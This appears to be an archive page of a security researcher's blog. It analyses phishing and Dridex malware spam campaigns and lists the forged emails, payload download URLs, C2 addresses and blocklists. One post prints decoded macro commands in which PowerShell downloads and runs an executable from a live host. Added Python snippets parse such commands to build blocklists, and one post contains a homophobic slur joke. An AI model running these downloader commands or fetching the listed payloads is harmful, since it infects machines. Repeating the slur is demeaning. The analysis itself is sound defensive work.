Showing posts with label 1&1. Show all posts

Tuesday, 24 May 2016

Phish: "TNT Consignment Notification" via rit.edu

This fake TNT notification is phishing for credentials:

From:    TNT Express
Reply-To:    sh3llsh0p@yahoo.com
Date:    24 May 2016 at 11:34
Subject:    TNT Consignment Notification

Attention: [redacted],

TNT is pleased to advise you that ANTONIOU KONSTANTINOS has arranged for a shipment to be collected from them on May 23, 2016 , and delivered to You on 275th May 2016.
The shipment has a TNT CONSIGNMENT NOTE NUMBER: 119138390

To be able to check the status of the shipment simply visit or click below to track.



http://www.tnt.com/webtracker/tracking.do?navigation=1&searchType=CON&respLang=en&respCountry=GENERIC&genericSiteIdent=.&cons=119138390


From :
ANTONIOU KONSTANTINOS
Theokritou 5
THESSALONIKI
THESSALONIKIS
546 27
GR

Pieces : 1
Weight : 0.5 KG
Shipment reference :
Description : sample
If you would like to find out about the many ways TNT helps you to track your shipment, or if you would like to know more about the services provided by TNT, simply connect to www.tnt.com and select your location at any time.


---------------------------------------------------------------------------------------------------------------
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
Please consider the environmental impact before printing this document and its attachment(s). Print black and white and double-sided where possible.
------------------------------------------------------------------------------
The link in the email is disguised to make it look like a link to tnt.com, but in fact it goes to:

heurica.dk/tnt1/?email=[redacted]

which then forwards to

booking-smart-swim-school.co.uk/images/TNT/index.php?rand=13InboxLightaspxn.1774256418&fid&1252899642&fid.1&fav.1&email=[redacted]

This URLquery report shows what is going on, as the victim ends up on a laughably fake phishing page:


Presumably this is phishing for general email credentials rather than a TNT login. The originating IP is 87.106.178.108 (1&1, Germany), relayed via an apparently compromised account or server at pmdf01b.rit.edu.



Wednesday, 9 March 2016

Malware spam: "DOC-Z21193008" / Idris Mohammed [idrismohammed25@gmail.com]

This terse spam has a malicious attachment. There is no body text.
From:    Idris Mohammed [idrismohammed25@gmail.com]
Date:    9 March 2016 at 09:55
Subject:    DOC-Z21193008
Attached is a file img-DOC-Z21193008.docm which I have seen two versions of (VirusTotal results [1] [2]). Automated analysis [3] [4] [5] [6] shows the macro in these two documents downloading from:
 
gpcarshop.com.br/system/logs/07yhnt7r64.exe
karnavalnye.com/system/logs/07yhnt7r64.exe


There are no doubt several other download locations. This binary has a detection rate of 3/56. The various reports indicate that it phones home to a server at:

64.76.19.251 (Impsat, Argentina)

I strongly recommend that you block traffic to that IP. Payload is likely to be the Dridex banking trojan.

UPDATE

A contact sent some more download locations (thank you!)

oceanglass.com.my/system/logs/07yhnt7r64.exe
variant13.ru/system/logs/07yhnt7r64.exe
e-kalogritsas.gr/system/logs/07yhnt7r64.exe
notasvet.ru/system/logs/07yhnt7r64.exe
racingtrack.ru/system/logs/07yhnt7r64.exe


..and also some additional C2s..

188.40.224.78 (NoTag Community / Hetzner, Germany)
87.106.8.177 (1&1, Germany)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)


Recommended blocklist:
64.76.19.251
188.40.224.78
87.106.8.177
91.236.4.234




Thursday, 3 March 2016

Malware spam: "Receipt - Order No 173535" / Sally Webb [swebb@thekmgroup.co.uk]

This spam does not come from KM Media Group but it is instead a simple forgery with a malicious attachment:

From     Sally Webb [swebb@thekmgroup.co.uk]
Date     Thu, 03 Mar 2016 10:58:07 +0100
Subject     Receipt - Order No 173535

--

regards,
Sally


*Sally Webb*
Recruitment Media Sales Executive
KM Media Group

DDI : 01622 794500
Email : swebb@thekmgroup.co.uk

*KM Media Group is Kent's only independent multimedia company*

*433,751 readers*, 166,800 listeners** and 1,668,973 monthly unique
browsers*** Together we make a difference*

*Sources: * JICREG Apr 2015 / ** RAJAR Q1 2015 / *** ABC Jul - Dec 2014
Get local news direct to your inbox by subscribing to daily KM News Alerts
and the Kent Business newsletter and our weekly What's On round-up.*

Attached is a file Receipt - Order No 173535.docm which comes in several different versions with detection rates around 3/55. Analysis from another source (thank you) gives download locations at:

coolsellers4u.com/catalog/controller/98yh87b564f.exe
corsian.com/system/logs/98yh87b564f.exe
demo.rent-shops.ru/foto/26/98yh87b564f.exe
dremasleep.by/system/logs/98yh87b564f.exe
euro-basket.ru/wp-content/upgrade/98yh87b564f.exe
isgim.com/system/logs/98yh87b564f.exe
jmc-thai.com/system/logs/98yh87b564f.exe
mevabekhuongnhi.com/system/logs/98yh87b564f.exe
msco.com.vn/system/logs/98yh87b564f.exe
myfabbfinds.com/system/logs/98yh87b564f.exe
partiduragi.com/system/logs/98yh87b564f.exe
paslanmazmobilya.org/system/logs/98yh87b564f.exe
vmagazin55.ru/system/logs/98yh87b564f.exe


The initial payload had a detection rate of 4/55; it has since been replaced with a new payload with a similar detection rate. My source says that this is Dridex botnet 220 (not Locky) with C&C servers at:

188.40.224.78 (Hetzner / NoTaG Community, Germany)
78.108.93.186 (Majordomo LLC, Russia)
87.106.8.177 (1&1, Germany)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)


Recommended blocklist:
188.40.224.78
78.108.93.186
87.106.8.177
91.236.4.234


Thursday, 30 April 2015

Malware spam: "Rebecca McDonnell [rebecca@gascylindersuk.co.uk]" / "Telephone order form"

This fake financial email is not from Gas Cylinders UK but is instead a simple forgery with a malicious attachment.

From:    Rebecca McDonnell [rebecca@gascylindersuk.co.uk]
Date:    30 April 2015 at 09:54
Subject:    Telephone order form

Telephone order form attached
Regards,

Rebecca McDonnell
Business Administrator

340a Haydock Lane, Haydock Industrial Estate,
St Helens, Merseyside, WA11 9UY
DDI:  01744 304338
Fax: 01942 275 312
Email: rebecca@gascylindersuk.co.uk


***** D i s c l a i m e r *****

This e-mail message is confidential and may contain legally privileged information. If you are not the intended recipient you should not read, copy, distribute, disclose or otherwise use the information in this e-mail.  Please also telephone us on 0800 622 6330, immediately and delete the message from your system. E-mail may be susceptible to data corruption, interception and unauthorised amendment, and we do not accept liability for such corruption, interception or amendment or the consequences thereof.
There is a malicious Word document attached with the name TELEPHONE PURCHASE ORDER FORM.doc which probably comes in a few different variants, but the one I saw had a VirusTotal detection rate of 4/56 and contained this malicious macro [pastebin] which downloaded a component from the following location:

http://morristonrfcmalechoir.org/143/368.exe

This is saved as %TEMP%\serebok2.exe and has a detection rate of 8/56. Analysis tools are a bit patchy today, but the VirusTotal report indicates traffic to:

212.227.89.182 (1&1, Germany)

The Malwr report reported a dropped Dridex DLL with a detection rate of 3/55.


Wednesday, 1 April 2015

Malware spam: "Batchuser BATCHUSER [ecommsupport@cihgroup.com]" / "CIH Delivery Note 0051037484"

The CIH Group is the name behind the Euronics brand. They are not sending out this spam, instead it is a simple forgery with a malicious attachment.

From:    Batchuser BATCHUSER [ecommsupport@cihgroup.com]
Date:    31 March 2015 at 09:15
Subject:    CIH Delivery Note 0051037484

**********************************************************************
This email and the information it contains are private, may be confidential and are for the intended recipient only. If you received this email in error please notify the sender immediately, confirm that it has been deleted from your system and that all copies have been destroyed. You should not copy it for any purpose or disclose its contents to any other person.
Internet communications are not secure and therefore CIH does not accept legal responsibility for the contents of this message.
We use reasonable endeavours to virus scan all outgoing emails but no warranty is given that this email and any attachments are virus free. You should undertake your own virus checking. We reserve the right to monitor email communications through our networks.
Combined Independents (Holdings) Ltd is registered in England No 767658 and has its registered offices at
Euro House, Joule Road, Andover, SP10 3GD

**********************************************************************
Apart from the disclaimer there is no body text. If you do as the disclaimer says and run the attached Word document (CIH Delivery Note 0051037484.doc) through an anti-virus product then it will appear to be clean, but it actually contains this malicious macro [pastebin] which downloads a component from:

http://www.tschoetz.de/122/091.exe

This is saved as %TEMP%\stoiki86.exe. There are usually two or three different download locations, but they will all lead to the same binary, which in this case has a detection rate of 5/56.

Various automated analysis tools [1] [2] [3] [4] show traffic to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
37.139.47.81 (Comfortel Ltd / Pirix, Russia)
72.167.62.27 (GoDaddy, US)
212.227.89.182 (1&1, Germany)
46.228.193.201 (Aqua Networks Ltd, Germany)
46.101.49.125 (Digital Ocean Inc, Netherlands)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc, US)
95.211.184.249 (Leaseweb, Netherlands)

According to this Malwr report it also drops another version of the downloader [VT 4/57] and a malicious DLL which will almost definitely be Dridex [VT 2/57].

Recommended blocklist:
91.242.163.70
37.139.47.81
72.167.62.27
212.227.89.182
46.228.193.201
46.101.49.125
198.245.70.182
95.211.184.249

Thursday, 19 February 2015

Malware spam: "State Department" / "Order state T/N:" with a hidden message

These spam emails claim both to be from the "State Department" and somebody else at the same time, so I guess they must have been sent by the intern at Dridex HQ. And also they have a hidden message, apparently aimed at me..

From:    Hollie Wyatt , State Department
Date:    19 February 2015 at 12:13
Subject:    Order state T/N:XZ3543_327

Your order is ready for collection at your chosen store.View full order details T/N:XZ3543_327 in attached document.

Thanks!
Hollie Wyatt .
PRAETORIAN RESOURCES LTD

----------

From:    Jodi Russell , State Department
Date:    19 February 2015 at 12:16
Subject:    Order state T/N:HD6061_902

Your order is ready for collection at your chosen store.View full order details T/N:HD6061_902 in attached document.

Thanks!
Jodi Russell .
BARON OIL PLC

----------

From:    Nathanial Mckinney , State Department
Date:    19 February 2015 at 13:26
Subject:    Order state T/N:UH0141_809

Your order is ready for collection at your chosen store.View full order details T/N:UH0141_809 in attached document.

Thanks!
Nathanial Mckinney .
SIRIUS MINERALS PLC
Attached is a ZIP file that largely matches the reference number in the email, and inside that is a malicious spreadsheet called Order.xls which contains this macro.

In there is the usual combination of an encrypted string and decryption routine. Feed one into the other and you get..
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
But wait.. what's this?
http://85.143.166.123/ssdynamooss/sspidarss.cab
"Пидар" is not in my limited Russian vocabulary, but it seems to translate as a traditional type of meatball in gravy.

Faggots with more sauce!  Hooray

Incidentally, 85.143.166.123 is a Pirix IP in Russia, and I have also seen malicious activity on the following Pirix IPs:

85.143.166.123
85.143.166.72
85.143.166.132

37.139.47.167
37.139.47.103
37.139.47.117
37.139.47.105

So I think I'm going to recommend blocking a couple of Pirix /24s at the end.

Anyway.

The macro downloads a file from http://85.143.166.123/ssdynamooss/sspidarss.cab which it saves as %TEMP%\FgdgFFFgfgF.cab, and it then attempts to EXPAND it to %TEMP%\FgdgFFFgfgF.exe. That doesn't quite work as expected, because the .CAB file is already an .EXE file. Must be the intern again. Anyway, EXPAND simply copies the file from CAB to EXE, so it still works.
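As an added example (not part of the original post), here is a Python parser for the downloader command line shown above: it pulls out the download URL, the path the file is saved to, the EXPAND destination and the executable that is started, and then builds a blocklist in which any /24 that contributed two or more observed addresses is listed as a whole network, as done for the Pirix ranges above. The log lines are constructed from the commands quoted in this post; the function and variable names are my own.

```python
import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlparse

# The downloader one-liner from the Order.xls macro has three stages:
#   DownloadFile('<url>','<save path>'); expand <save path> <exe>; start <exe>
DOWNLOADFILE_RE = re.compile(
    r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<save>[^']+)'\s*\)",
    re.IGNORECASE)
EXPAND_RE = re.compile(r"\bexpand\s+(?P<src>[^\s;]+)\s+(?P<dst>[^\s;]+)",
                      re.IGNORECASE)
START_RE = re.compile(r"\bstart\s+(?P<exe>[^\s;]+)", re.IGNORECASE)


def parse_downloader(cmdline: str):
    """Extract network and file-system indicators from one command line.

    Returns None when the line does not contain the DownloadFile pattern,
    so benign process-creation records are skipped.
    """
    m = DOWNLOADFILE_RE.search(cmdline)
    if m is None:
        return None
    expand = EXPAND_RE.search(cmdline)
    started = START_RE.search(cmdline)
    return {
        "url": m.group("url"),
        "host": urlparse(m.group("url")).hostname,
        "saved_as": m.group("save"),
        # The post notes the "CAB" is really an EXE; EXPAND just copies it.
        "expanded_to": expand.group("dst") if expand else None,
        "started": started.group("exe") if started else None,
    }


def hosts_from_cmdlines(lines):
    """Return the download hosts from every matching command line, in order."""
    hosts = []
    for line in lines:
        parsed = parse_downloader(line)
        if parsed is not None and parsed["host"]:
            hosts.append(parsed["host"])
    return hosts


def collapse_blocklist(ips, threshold: int = 2):
    """Turn observed IPs into a blocklist.

    Any /24 that contributed at least `threshold` distinct addresses is
    listed as the whole network (the post's reasoning for the two Pirix
    ranges); everything else is listed as a single host.
    """
    by_net = defaultdict(set)
    for ip in ips:
        net = ipaddress.ip_network(f"{ip}/24", strict=False)
        by_net[net].add(ipaddress.ip_address(ip))
    entries = []
    for net, hosts in by_net.items():
        if len(hosts) >= threshold:
            entries.append(str(net))
        else:
            entries.extend(str(h) for h in hosts)
    return sorted(entries)


# Constructed sample log lines: the three macro commands quoted in the post
# plus one benign command, as a process-creation log might record them.
SAMPLE_CMDLINES = [
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.123/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;",
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;",
    r"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;",
    r"cmd /K dir %TEMP%",
]

# Other IPs the post lists: the Pirix addresses and the three C2s.
OTHER_OBSERVED_IPS = [
    "85.143.166.72", "85.143.166.132",
    "37.139.47.167", "37.139.47.103", "37.139.47.117", "37.139.47.105",
    "82.151.131.129", "121.50.43.175", "74.208.68.243",
]


def build_blocklist():
    """Combine command-line hosts with the other observations into a blocklist."""
    return collapse_blocklist(hosts_from_cmdlines(SAMPLE_CMDLINES) + OTHER_OBSERVED_IPS)


if __name__ == "__main__":
    for entry in build_blocklist():
        print(entry)
```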

This executable has a VirusTotal detection rate of 8/57. Automated analysis tools [1] [2] plus some private sources indicate that this malware calls out to some familiar IPs:

82.151.131.129 (DorukNet, Turkey)
121.50.43.175 (Tsukaeru.net, Japan)
74.208.68.243 (1&1, US)

According to the Malwr report,  it drops the same Dridex DLL that has been doing the rounds all day, with a VirusTotal detection rate of 8/57.

Update:
A second spam run is happening, with various senders and subjects, for example:
Byron Pittman , Bill Department
Freda Kelly , Bill Department
Leroy Gallegos , Bill Department
Terrence Reyes , Bill Department
Tyson Miller , Bill Department
Marlene Morales , Bill Department
Royal Byrd , Bill Department
Larry Kramer , Bill Department
Jenna Sparks , Bill Department
Debra Thomas , Bill Department

LE8427_395.zip attached   
MM4565_687.zip attached
SL7772_820.zip attached
MF9529_495.zip attached
DH0645_249.zip attached
ED9340_241.zip attached
HJ7305_966.zip attached
UA0899_018.zip attached
HO2362_958.zip attached
JL3695_098.zip attached
There are three different ZIP files, containing either Order.xls, Confirmation.xls or order_tatus.xls (sic). The macro is similar to the one above, but has a couple of other download locations.
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;

These are:

134.19.180.44 (Global Layer, NL)
185.48.56.137 (Sinarohost, NL)

Payload is the same as before.


Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24
134.19.180.44
185.48.56.137

Tuesday, 17 February 2015

Malware spam: "AR.Support@efi.com" / "Customer statement 0001031389 as on 02/05/2015"

This fake financial document has a malicious attachment:

From:    AR.Support@efi.com
To:    minutemanpresschicago@comcast.net
Date:    17 February 2015 at 10:22
Subject:    Customer statement 0001031389 as on 02/05/2015

Dear EFI Customer,


Please find attached your statement for this month. If you need invoice
copies or have any questions you can reply to this e mail and we will
contact you at the earliest.


Regards,
AR Support
AR.Support@efi.com


** Attention AP Department ** Effective April 25th our new remittance address will change to
the following. Please update your records. Thank you.

PO Box 742366
Los Angeles, CA. 90074-2366

Confidentiality notice: This message may contain confidential information. It is intended only for the person to whom it is addressed. If you are not that person, you should not use this message. We request that you notify us by replying to this message, and then delete all copies including any contained in your reply. Thank you.
Attached is a Word document Customer statement 0001031389 as on 02052015.DOC which comes in two different types with zero detection rates [1] [2] containing two highly obfuscated modular macros [1] [2]  that actually just perform a ROT13 transformation on a couple of strings.

uggc://zjpbq4.pon.cy/wf/ova.rkr
uggc://nyhpneqban.pbz/wf/ova.rkr

Which decodes to:

http://mwcod4.cba.pl/js/bin.exe
http://alucardona.com/js/bin.exe
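An added example (not from the original post): a small Python helper that scans extracted macro strings for ROT13-rotated http(s) URLs, decodes them and defangs them for a report. The sample strings are the two from this post embedded in constructed VBA-style noise; the function names are my own.

```python
import codecs
import re

# ROT13 leaves digits and punctuation alone, so "http://" becomes "uggc://"
# and "https://" becomes "uggcf://": a cheap signature for rotated URLs.
ROT13_URL_RE = re.compile(r"uggcf?://[A-Za-z0-9.\-_/]+")


def rot13(text: str) -> str:
    """Apply the ROT13 letter rotation (it is its own inverse)."""
    return codecs.decode(text, "rot_13")


def find_rot13_urls(blob: str) -> list:
    """Return the decoded form of every ROT13-hidden http(s) URL in blob.

    blob is whatever strings were pulled out of the macro (olevba output,
    a pastebin dump, a decompiled module); only the rotated URLs matter.
    """
    return [rot13(m.group(0)) for m in ROT13_URL_RE.finditer(blob)]


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked when pasted into a report."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return (scheme.replace("http", "hxxp") + "://"
            + host.replace(".", "[.]") + sep + path)


# Constructed sample: the two rotated strings quoted in the post, wrapped in
# VBA-looking assignments so the scan has to pick them out of surrounding text.
SAMPLE_MACRO_STRINGS = '''
Dim s1 As String: s1 = "uggc://zjpbq4.pon.cy/wf/ova.rkr"
Dim s2 As String: s2 = "uggc://nyhpneqban.pbz/wf/ova.rkr"
'''


def decode_sample() -> list:
    """Decode and defang the sample strings; returns the defanged URLs."""
    return [defang(u) for u in find_rot13_urls(SAMPLE_MACRO_STRINGS)]


if __name__ == "__main__":
    for url in decode_sample():
        print(url)
```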

This has a VirusTotal detection rate of 5/57. Automated analysis tools [1] [2] [3] show the malware attempting to connect to:

202.44.54.5 (World Internetwork Corporation, Thailand)
66.110.179.66 (Microtech Tel, US)
92.63.88.105 (MWTV, Latvia)

According to the Malwr report this drops a DLL with a detection rate of 2/57 which is probably Dridex.

Recommended blocklist:
202.44.54.5
66.110.179.66
92.63.88.105

Monday, 19 January 2015

Malware spam: "repairermessages@fmg.co.uk" / "Insurance Inspection Arranged AIG02377973" / "FMG Support Group Ltd"

This spam does not come from FMG Support Group Ltd, but instead it is a forgery. FMG are not sending out the spam, nor have their systems been compromised in any way. Instead, this spam has a malicious Word document attached.
From:    repairermessages@fmg.co.uk
Date:    19 January 2015 at 07:24
Subject:    Insurance Inspection Arranged AIG02377973

FMG is committed to reducing its impact on the environment. Please don't print this email unless absolutely necessary.

Have you been impressed by one of our people?
If so, we'd love to hear about it. You can nominate someone for a Spirit award by emailing spirit@fmg.co.uk

FMG Support Group Ltd. Registered in England. No. 06489429.
Registered office: FMG House, St Andrews Road, Huddersfield, HD1 6NA.

Tel: 0844 243 8888
Email: info@fmg.co.uk

This email may contain confidential information and/or copyright material. This email is intended for the use of the addressee only. Any unauthorised use may be unlawful. If you received this email by mistake, please advise the sender by using the reply facility in your email software.

Outbound Message checked by Websense Mail Control.
Attached is a Word document AIG02377973-InsuranceInspectionArranged.doc which comes in at least two different versions, neither of which are detected by AV vendors [1] [2]. These documents contain two slightly different malicious macros [1] [2] which attempt to download a further component from:

http://chilan.ca/js/bin.exe
http://techno-kar.ru/js/bin.exe

This is saved as %TEMP%\324234234.exe which has a VirusTotal detection rate of 2/57. The Malwr report shows it attempting to communicate with the following IPs:

59.148.196.153 (HKBN, Hong Kong)
74.208.11.204 (1&1, US)


These two IP addresses have been used by this malware for a long time; I strongly recommend you block them. Also, a malicious DLL is dropped on the infected system with a detection rate of just 2/53.
 

Thursday, 15 January 2015

Malware Spam: "HEXIS (UK) LIMITED" / "Invoice from Hexis"

This fake invoice has a malicious attachment. It does not come from Hexis UK Ltd; it is a forgery. Hexis is not sending the spam, nor have their systems been compromised in any way.

From:    Invoice from Hexis [Invoice@hexis.co.uk]
Date:    15 January 2015 at 06:36
Subject:    Invoice

Sent 15 JAN 15 08:30

HEXIS (UK) LIMITED
7 Europa Way
Britannia Park
Lichfield
Staffordshire
WS14 9TZ

Telephone 01543 411221
Fax 01543 411246 
Attached is a malicious Word document S-INV-CREATIFX-465219.doc which actually comes in two different versions (perhaps more) with low detection rates [1] [2] containing two slightly different macros [1] [2] which download a component from one of the following locations:

http://dramakazuki.kesagiri.net/js/bin.exe
http://cassiope.cz/js/bin.exe

This has a VirusTotal detection rate of 3/57. That report shows the malware phoning home to 74.208.11.204:8080 (1&1 Internet, US) which is a familiar C&C server which you should definitely block traffic to. My sources also identify a couple of other IPs, giving a recommended blocklist of:

59.148.196.153
74.208.11.204
81.27.38.97


UPDATE: the Malwr report shows that it drops a DLL with a VirusTotal detection rate of just 1/57.



Wednesday, 24 December 2014

Malware spam: Rhianna Wellings / Rhianna@teckentrupdepot.co.uk / Signature Invoice 44281

Teckentrup Depot UK is a legitimate UK company, but these emails are not from Teckentrup Depot and they contain a malicious attachment. Teckentrup Depot has not been hacked, their database has not been compromised, and they are not responsible for this in any way.

From:    Rhianna Wellings [Rhianna@teckentrupdepot.co.uk]
Date:    24 December 2014 at 07:54
Subject:    Signature Invoice 44281

Your report is attached in DOC format.

To load the report, you will need the Microsoft® Word® reader, available to download at http://www.microsoft.com/
Attached is a malicious Word document called Signature Invoice.doc which comes in two different versions, both of which are undetected by AV vendors [1] [2]. Each one contains a different macro [1] [2] [pastebin] which then downloads an additional component from one of these two locations:

http://Lichtblick-tiere.de/js/bin.exe
http://sunfung.hk/js/bin.exe

The file is saved into the location %TEMP%\1V2MUY2XWYSFXQ.exe and currently has a VirusTotal detection rate of just 4/56. The ThreatExpert report shows traffic to the following IPs:

74.208.11.204 (1&1 Internet, US)
81.169.156.5 (Strato AG, Germany)
59.148.196.153 (HKBN, Hong Kong)

According to the Malwr report it also drops a malicious DLL with a detection rate of 24/56, detected as the Dridex banking trojan.

Recommended blocklist:
74.208.11.204
81.169.156.5
59.148.196.153
lichtblick-tiere.de
sunfung.hk

Wednesday, 17 December 2014

Malware spam: UK GEOLOGY PROJECT by "Rough & Tumble" with "Moussa Minerals" [roughandtumble63@yahoo.co.uk]

This somewhat odd and terse spam comes with a malicious attachment.

From:    UK GEOLOGY PROJECT by "Rough & Tumble" with "Moussa Minerals" <roughandtumble63@yahoo.co.uk>
Date:    17 December 2014 at 07:20
Subject:    Invoice as requested
There is no body text, but there is a malicious DOC attachment named 20140918_122519.doc which comes in two slightly different versions with poor detection rates [1] [2]. The macros have been subtly changed from recent spam runs [1] [2] [pastebin] and download a second stage from one of the following locations:

http://openstacksg.com/js/bin.exe
http://worldinlens.net/js/bin.exe


This malicious executable is saved as %TEMP%\ADGYMSEKRJE.exe and has a detection rate of only 2/54.

As is common with recent similar malware attempts, it attempts to phone home to 74.208.11.204 (1&1, US) as shown in the ThreatTrack report [pdf]. The Malwr report indicates a dropped file with an MD5 of ee826c184155a1fa1aea984f914e606a which is probably Dridex.

Wednesday, 10 December 2014

Spam: "Remittance Advice from Anglia Engineering Solutions Ltd"

This spam email does not come from Anglia Engineering Solutions Ltd but instead comes from a criminally-operated botnet and has a malicious attachment.

From:     Serena Dotson
Date:     10 December 2014 at 10:33
Subject:     Remittance Advice from Anglia Engineering Solutions Ltd [ID 334563N]

Dear ,

We are making a payment to you.

Please find attached a copy of our remittance advice, which will reach your bank account on 11/12/2014.

If you have any questions regarding the remittance please contact us using the details below.


Kind regards
Serena Dotson
Anglia Engineering Solutions Ltd
Tel: 01469 520572

The sender's name, ID number and attachment name vary from spam email to spam email. It comes with one of two Excel attachments, both of which are malicious but undetected by any AV product [1] [2]. Each contains one of two malicious macros [1] [2] [pastebin] which attempt to download an executable from the following locations:

http://217.174.240.46:8080/stat/lld.php
http://187.33.2.211:8080/stat/lld.php


This file is downloaded as test.exe and is then copied to %TEMP%\LNUDTUFLKOJ.exe. This executable has a VirusTotal detection rate of just 1/55. The ThreatTrack report [pdf] shows attempted connections to the following IPs:

194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
84.92.26.50 (PlusNet, UK)
87.106.246.201 (1&1, Germany)

Traffic to 194.146.136.1 is also confirmed by VirusTotal. The Malwr report shows the same traffic.

The payload is most likely Dridex, a banking trojan.

I recommend that you block traffic to the following IPs:
194.146.136.1
84.92.26.50
87.106.246.201

217.174.240.46
187.33.2.211

Monday, 8 December 2014

"Soo Sutton" / "INVOICE 224245 from Power EC Ltd" spam

Another variant of this spam, this fake invoice comes with a malicious Word document attached.
From:     soo.sutton966@powercentre.com
Date:     8 December 2014 at 10:57
Subject:     INVOICE 224245 from Power EC Ltd

Please find attached INVOICE number 224245 from Power EC Ltd
Attached is one of two Word documents, both with the name 224245.doc but with slightly different macros. Neither is currently detected by any AV vendor [1] [2]. Inside the DOC is one of two malicious macros [1] [2] [pastebin] which then downloads an executable from one of the following locations:

http://aircraftpolish.com/js/bin.exe
http://gofoto.dk/js/bin.exe


This file is then saved as %TEMP%\CWRSNUYCXKL.exe and currently has zero detections at VirusTotal. The ThreatExpert report shows that it connects to:

203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1 Internet, US)

According to the Malwr report this executable drops a DLL with a slightly better detection rate of 5/53.

Recommended blocklist:
203.172.141.250
74.208.11.204
aircraftpolish.com
gofoto.dk

UPDATE 2014-12-09:

A further couple of variants are being spammed out, both with low detections by VirusTotal [1] [2] and containing one of two malicious macros [1] [2] [pastebin] which downloads from the following locations:

http://kawachiya.biz/js/bin.exe
http://darttoolinc.com/js/bin.exe


This is then saved as %TEMP%\YVXBZJRGJYE.exe and is presently undetected by vendors. The Malwr report and ThreatExpert report vary slightly, but both show traffic to the same IPs as before. The Malwr report also indicates that a DLL is dropped with a detection rate of 4/52 which is identified as the Dridex trojan.

Recommended blocklist:
203.172.141.250
74.208.11.204
kawachiya.biz
darttoolinc.com

Thursday, 30 January 2014

WTF is s15443877[.]onlinehome-server[.]info?

Something that caught my eye was this Google Safebrowsing diagnostic for [donotclick]s15443877.onlinehome-server.info:

Safe Browsing

Diagnostic page for s15443877.onlinehome-server.info

What is the current listing status for s15443877.onlinehome-server.info?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Of the 1746 pages we tested on the site over the past 90 days, 582 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2014-01-29, and the last time suspicious content was found on this site was on 2014-01-29. Malicious software includes 166 scripting exploit(s), 166 trojan(s), 89 exploit(s). Successful infection resulted in an average of 5 new process(es) on the target machine.
Malicious software is hosted on 198 domain(s), including mendozaempleos.com/, e-veleta.com/, forogozoropoto.2waky.com/.
155 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including chebro.es/, formandfinishpdr.com/, mendozaempleos.com/.
This site was hosted on 1 network(s) including AS8560 (ONEANDONE-AS).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, s15443877.onlinehome-server.info did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Not only are (exactly) one third of the pages crawled hosting malware, but there are a staggering 198 domains spreading it. Usually it's just a handful of sites, but this is the most I've ever seen.

VirusTotal also shows some historical evil going on with the IP of 212.227.141.247 (1&1, Germany) and a Google of the site contents shows thousands of hits of what appears to be scraped content in Spanish.

It's hard to say just what this site is, but with Google diagnostics like that then it is unlikely to be anything good and blocking s15443877.onlinehome-server.info or 212.227.141.247 might be prudent.

Tuesday, 26 November 2013

Something evil on 46.19.139.236

46.19.139.236 (Private Layer Inc, Switzerland) seems to be serving up some sort of Java exploit kit via injection attacks on hijacked legitimate domains. The domains in use rotate pretty quickly and I haven't got a copy of the payload, but VirusTotal has some examples. These are the domains that I can find running from this IP:


These seem to be a mix of GoDaddy, 1&1 and eNom registered domains that have been hijacked. Several of the parent domains have also been flagged as malicious by Google.

Tuesday, 23 July 2013

Malware sites to block 23/7/13

These malicious domains and IPs are associated with this prolific gang.  As usual, I've listed IPs with hosts first and then a plain list of IPs and domains for copy-and-pasting at the end.

5.175.191.106 (GHOSTnet, Germany)
24.173.170.230 (Time Warner Cable, US)
31.145.19.17 (Borusan Telekom / Ericsson-NET, Turkey)
41.196.17.252 (Link Egypt, Egypt)
46.246.41.68 (Portlane Networks, Sweden)
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
50.97.253.162 (Softlayer, US)
54.225.124.116 (Amazon AWS, US)
